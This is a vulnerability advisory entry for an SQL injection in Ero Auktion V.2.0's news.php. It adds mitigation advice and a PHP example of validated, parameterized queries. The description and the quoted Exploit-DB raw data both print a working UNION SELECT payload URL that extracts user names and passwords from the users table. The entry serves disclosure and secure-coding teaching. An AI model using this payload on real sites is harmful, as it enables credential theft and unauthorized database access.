Vendor: Ero Auktion
By: Easy Laster
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Ero Auktion
Affected Version From: V.2.0
Affected Version To: V.2.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:eroproject:ero_auktion
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
Year: 2010

Ero Auktion V.2.0 SQL Injection news.php

An SQL injection vulnerability exists in Ero Auktion V.2.0, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'news.php' script. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be done by appending the malicious SQL statement to the 'id' parameter in the 'news.php' script, such as 'www.site.com/flashauktion/news.php?id=11111111+union+select+1,2,concat%28name,0x3a,password%29,4,5+from+users'.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
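The following is an added example, not code from Ero Auktion or from the original advisory. It contrasts the injectable pattern (a request parameter concatenated straight into the SQL text) with the hardened form the mitigation describes: validate that `id` is a positive integer, then bind it as a prepared-statement parameter. The table and column names (`news`, `id`, `title`, `body`), the sample rows and the in-memory SQLite database are all constructed for the demonstration; a real deployment would point the PDO DSN at its own database.

```php
<?php
// Added example (not the product's code). Table/column names and sample rows
// are constructed so the script runs offline against in-memory SQLite.

// --- Injectable pattern: request value concatenated into the SQL text -----
// Anything the client sends after "id=" becomes part of the statement the
// database parses, which is exactly the defect the advisory describes.
function fetchNewsVulnerable(PDO $db, string $rawId): ?array
{
    $sql = "SELECT id, title, body FROM news WHERE id = " . $rawId;
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened form: validate the type, then bind as a parameter -----------
function fetchNewsSafe(PDO $db, string $rawId): ?array
{
    // 1. Validate: a news id is a positive integer. Reject anything else
    //    outright instead of trying to strip "dangerous" characters.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterize: the value is sent separately from the SQL text, so the
    //    database never interprets user input as part of the statement.
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Constructed demo database (hypothetical schema) ----------------------
function buildDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $db->exec("INSERT INTO news VALUES (1, 'Welcome', 'First post'),
                                      (2, 'Update',  'Second post')");
    return $db;
}

$db = buildDemoDb();

// Normal request: the hardened lookup returns the row.
var_dump(fetchNewsSafe($db, '2'));          // array with id=2, title=Update

// Malformed request of the kind shown in the advisory: the validator rejects
// it before any SQL is built, so the query never runs.
var_dump(fetchNewsSafe($db, '1 UNION SELECT 1,2,3'));   // NULL

// The same lookup as a request handler would use it, with output escaped
// for HTML so the page does not trade one injection class for another.
$news = fetchNewsSafe($db, $_GET['id'] ?? '1');
if ($news === null) {
    http_response_code(404);
    exit('Not found');
}
echo '<h1>' . htmlspecialchars($news['title'], ENT_QUOTES, 'UTF-8') . "</h1>\n";
echo '<div>' . htmlspecialchars($news['body'], ENT_QUOTES, 'UTF-8') . "</div>\n";
```

Two points worth noting in the hardened version: validation happens first and fails closed, so the query is never built from an unexpected value, and the bound parameter is typed as an integer, which removes the need to quote or escape anything in the SQL text. Against MySQL, setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the server itself perform the binding rather than the PHP driver.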

Exploit-DB raw data:

----------------------------Information----------------------------------------
+Author : Easy Laster
+Date   : 21.10.2010
+Script  : Ero Auktion V.2.0 SQL Injection news.php
+Download : -----
+Price : 34,90€
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor.
--------------------------------------------------------------------------------
 ___ ___ ___ ___                     _ _                         _         _
| | |   |   | | |___ ___ ___ ___ ___|_| |_ _ _ ___ ___ ___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _|  _| |  _| | |___| . |  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|_| |_|_| |_  |   |  _|_| |___|_| |___|___|_|
                                          |___|   |_|         |___|
--------------------------------------------------------------------------------
+Vulnerability : www.Site.com/news.php?id=[SQL]
+Exploitable   : www.site.com/flashauktion/news.php?id=11111111+union+select+1,2,concat%28name,0x3a,password%29,4,5+from+users
--------------------------------------------------------------------------------